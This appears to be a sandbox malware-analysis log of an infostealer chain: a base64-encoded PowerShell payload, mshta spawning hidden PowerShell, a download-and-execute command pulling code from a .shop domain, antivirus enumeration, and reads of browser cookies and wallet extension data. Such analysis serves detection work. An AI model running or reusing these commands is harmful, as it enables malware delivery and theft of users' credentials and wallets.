JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabuae0acqa1aewaaqbpagiauabyaegavwbgaegababkagsaoqbqafmamqbpaecaeqbsadqamwbjagmadwbyafgawgbkae8atqbiaeyatgblafqauqagad0aiaakagyaqqbmahmarqanaaoajab6aeyauqbqageacqbzahcangb6ahuamgblagganqbkagmatgbiafoaaabsahkabwbjafoaaabxafoamqbqagsanabiaesauqbjahqaawbtageawabpagwaqwb6adiacabzaewatabqaewaegb1agmaawbiafqadab5aeuarqbwahiasab5ag0amgbjaggarqbcahuauqa3agmaeqbkae4aiaa9acaajabuafiavqblaa0acgakagsatqbjagiadwbjafmaoabuaheamwa2adyamabrageabgayaemawqbgae0aywbkafcazqboaeiavwaxahcawqbwahuaegbvaemaygbaadyangb5ahiabgbxaguadqb3adkatqbeaekadwbeagcazqbtaesazaa1ahaawqaxaecawqbpaegavwbnaeuavwbmahkauqbsadgazaayaeoabwa3afqaawbnafeaywbnadmaawazag8arqbsadcaaabzafoatgboahmaoabpadmatgbdagiamwbbafaatgbqadqatqbsaeyauwblagwadwbnahqauwbpahoaqgbyagkauqbwafaaywbwagsaeab0aegauqbzaemavqbdafcamgbtaekadwbiafaarwbsafkacablahqadqbhagqasgbjaesayqbyadyanga2ag4azwbyafmaoaa2aeqadgbfaeqazwawaguarabhahmacqbsaegaeabkagcabqa2ae4arqbxae8aawbjadyarwa3aecarabraeqargb2ahuacabcaecacqb2adqaaga1aeuababwahkauab2adaacqbjae4anwbaaduazwb1ahcazqbmaeqavqb1afuacgbqaheabaagad0aiaakag4avqbmaewadqakacqabqbkaeeatqbzag0avqbfagiaygbwahgaqgbxafkaqqbhahmawgbtae4auwbxadcatwbmaeoaqqbyaguauabiafgasabuafqauqa1ahmangbnaheacqbuahcadwbfadaacablafcarwblafoatqbvae4adabkadmargbsadcauwb4ahuawqbjaheacwbkagoacwbiagiabqbragkaeabqahoazwbmagoauwbuaeoaoqbbaeyavwbfafkaswbmaeuawqbzahiatabcaemazqbkafganabkaesabgbjafoargb3ahcaygboaeearabwahmatqbpagiabab1afgaoabsafkarqbjageatabpaheatqbdafaasab3aeqadqbzahgavabpadqadaayaegabqbsahoargb5agmatqbtaegamqa4agmarwb6aeoawgbnaekanqbzahgauwbuahkazqbmadyabgb5ahaadablaguadga1aeeawaa1afiadwbcadqazabrahearqbjae0azgbrafcamwb0aecaqwbsafyatqbpahaarqa0aecadabpaeeaeqbtaeiangbmadmaywbkahianwbcae0auqbqaecaaqbtafkaygbkafiabqbqafyanqbbafiawqboagiauwbnadcaegbvaesavab0ae4azwbjaekarqbjaegabgbjafoavgayadaanabzae4avqbsagqaygboadkaywbxafcauqblahuatqbwagoacqbtaggaeqbtaecaywbrahcamabdadcadqb1afqauqbyaecamaaxaeyazgayafgaegagad0aigbeaguazgbsageaigagacsaiaaiahqazqbtahqacgblageabqaiadsajabkadeatwbcahgataaxadcavqaxadqanabwafeababpadkazaa5afeatwbmadcanqb6afqamaazahgasabjaewaygbrahoazabnadkawaa1aeeawabjaeuamqb4adaauab1adgavqbradkavabiag0arqbwadkaygbuageawabgagmatwa4adiaeabvadcabab3ag4avgbtahmauqayahmaoabfaggazabnaeqaaqbaagsatwa3afmazwb6adaatwbsae4aegbtahmawga3aeeaagbcafqawgbjagqaoabiafeaoabcaduauqa2ae8acwbsagwazqa2agqasabragsawgbwaewaeqbxahiacabpahuatqbtafgauqbsafcawqbgagwaoabfag8ababjafcauqb0aduacabnae0aaga2afkadqbwafiaywbeadkaeaa2afmatqbyadeacwbaadmavaa1ag4arga5ahoangb1aewababjaeoaoqbhaeuaaqbuafoaoqbhafqataa4agyanqbxagiawqbmagcaagayafiaeqbuadkaaqbqae4adabuahgavabyag0acwbragmacqbnadeavgbaagsauaboafyaaabkaduadwbvahiatgb2ag4amga1agyawabyae8ayqbtahcamqbqafcarwbbagsaagbkadqatab6ahcatwbuagwazabwagoarabkadeaswbtaggawabkadcabwbtafkanwboafaaeab5afuatabzadcazwbgadkazqbxagmauwbpag4aoqayagyaywbmaekauqb5aeyaegblaguadwbhaegacgb4aekauqbvagyatwbeaguatabiafkaqwb0aheatabpahmayqbgae0aywbrahoaqwbsahqaawbkag0amwbsadka
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabuae0acqa1aewaaqbpagiauabyaegavwbgaegababkagsaoqbqafmamqbpaecaeqbsadqamwbjagmadwbyafgawgbkae8atqbiaeyatgblafqauqagad0aiaakagyaqqbmahmarqanaaoajab6aeyauqbqageacqbzahcangb6ahuamgblagganqbkagmatgbiafoaaabsahkabwbjafoaaabxafoamqbqagsanabiaesauqbjahqaawbtageawabpagwaqwb6adiacabzaewatabqaewaegb1agmaawbiafqadab5aeuarqbwahiasab5ag0amgbjaggarqbcahuauqa3agmaeqbkae4aiaa9acaajabuafiavqblaa0acgakagsatqbjagiadwbjafmaoabuaheamwa2adyamabrageabgayaemawqbgae0aywbkafcazqboaeiavwaxahcawqbwahuaegbvaemaygbaadyangb5ahiabgbxaguadqb3adkatqbeaekadwbeagcazqbtaesazaa1ahaawqaxaecawqbpaegavwbnaeuavwbmahkauqbsadgazaayaeoabwa3afqaawbnafeaywbnadmaawazag8arqbsadcaaabzafoatgboahmaoabpadmatgbdagiamwbbafaatgbqadqatqbsaeyauwblagwadwbnahqauwbpahoaqgbyagkauqbwafaaywbwagsaeab0aegauqbzaemavqbdafcamgbtaekadwbiafaarwbsafkacablahqadqbhagqasgbjaesayqbyadyanga2ag4azwbyafmaoaa2aeqadgbfaeqazwawaguarabhahmacqbsaegaeabkagcabqa2ae4arqbxae8aawbjadyarwa3aecarabraeqargb2ahuacabcaecacqb2adqaaga1aeuababwahkauab2adaacqbjae4anwbaaduazwb1ahcazqbmaeqavqb1afuacgbqaheabaagad0aiaakag4avqbmaewadqakacqabqbkaeeatqbzag0avqbfagiaygbwahgaqgbxafkaqqbhahmawgbtae4auwbxadcatwbmaeoaqqbyaguauabiafgasabuafqauqa1ahmangbnaheacqbuahcadwbfadaacablafcarwblafoatqbvae4adabkadmargbsadcauwb4ahuawqbjaheacwbkagoacwbiagiabqbragkaeabqahoazwbmagoauwbuaeoaoqbbaeyavwbfafkaswbmaeuawqbzahiatabcaemazqbkafganabkaesabgbjafoargb3ahcaygboaeearabwahmatqbpagiabab1afgaoabsafkarqbjageatabpaheatqbdafaasab3aeqadqbzahgavabpadqadaayaegabqbsahoargb5agmatqbtaegamqa4agmarwb6aeoawgbnaekanqbzahgauwbuahkazqbmadyabgb5ahaadablaguadga1aeeawaa1afiadwbcadqazabrahearqbjae0azgbrafcamwb0aecaqwbsafyatqbpahaarqa0aecadabpaeeaeqbtaeiangbmadmaywbkahianwbcae0auqbqaecaaqbtafkaygbkafiabqbqafyanqbbafiawqboagiauwbnadcaegbvaesavab0ae4azwbjaekarqbjaegabgbjafoavgayadaanabzae4avqbsagqaygboadkaywbxafcauqblahuatqbwagoacqbtaggaeqbtaecaywbrahcamabdadcadqb1afqauqbyaecamaaxaeyazgayafgaegagad0aigbeaguazgbsageaigagacsaiaaiahqazqbtahqacgblageabqaiadsajabkadeatwbcahgataaxadcavqaxadqanabwafeababpadkazaa5afeatwbmadcanqb6afqamaazahgasabjaewaygbrahoazabnadkawaa1aeeawabjaeuamqb4adaauab1adgavqbradkavabiag0arqbwadkaygbuageawabgagmatwa4adiaeabvadcabab3ag4avgbtahmauqayahmaoabfaggazabnaeqaaqbaagsatwa3afmazwb6adaatwbsae4aegbtahmawga3aeeaagbcafqawgbjagqaoabiafeaoabcaduauqa2ae8acwbsagwazqa2agqasabragsawgbwaewaeqbxahiacabpahuatqbtafgauqbsafcawqbgagwaoabfag8ababjafcauqb0aduacabnae0aaga2afkadqbwafiaywbeadkaeaa2afmatqbyadeacwbaadmavaa1ag4arga5ahoangb1aewababjaeoaoqbhaeuaaqbuafoaoqbhafqataa4agyanqbxagiawqbmagcaagayafiaeqbuadkaaqbqae4adabuahgavabyag0acwbragmacqbnadeavgbaagsauaboafyaaabkaduadwbvahiatgb2ag4amga1agyawabyae8ayqbtahcamqbqafcarwbbagsaagbkadqatab6ahcatwbuagwazabwagoarabkadeaswbtaggawabkadcabwbtafkanwboafaaeab5afuatabzadcazwbgadkazqbxagmauwbpag4aoqayagyaywbmaekauqb5aeyaegblaguadwbhaegacgb4aekauqbvagyatwbeaguatabiafkaqwb0aheatabpahmayqbgae0aywbrahoaqwbsahqaawbkag0amwbsadka
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
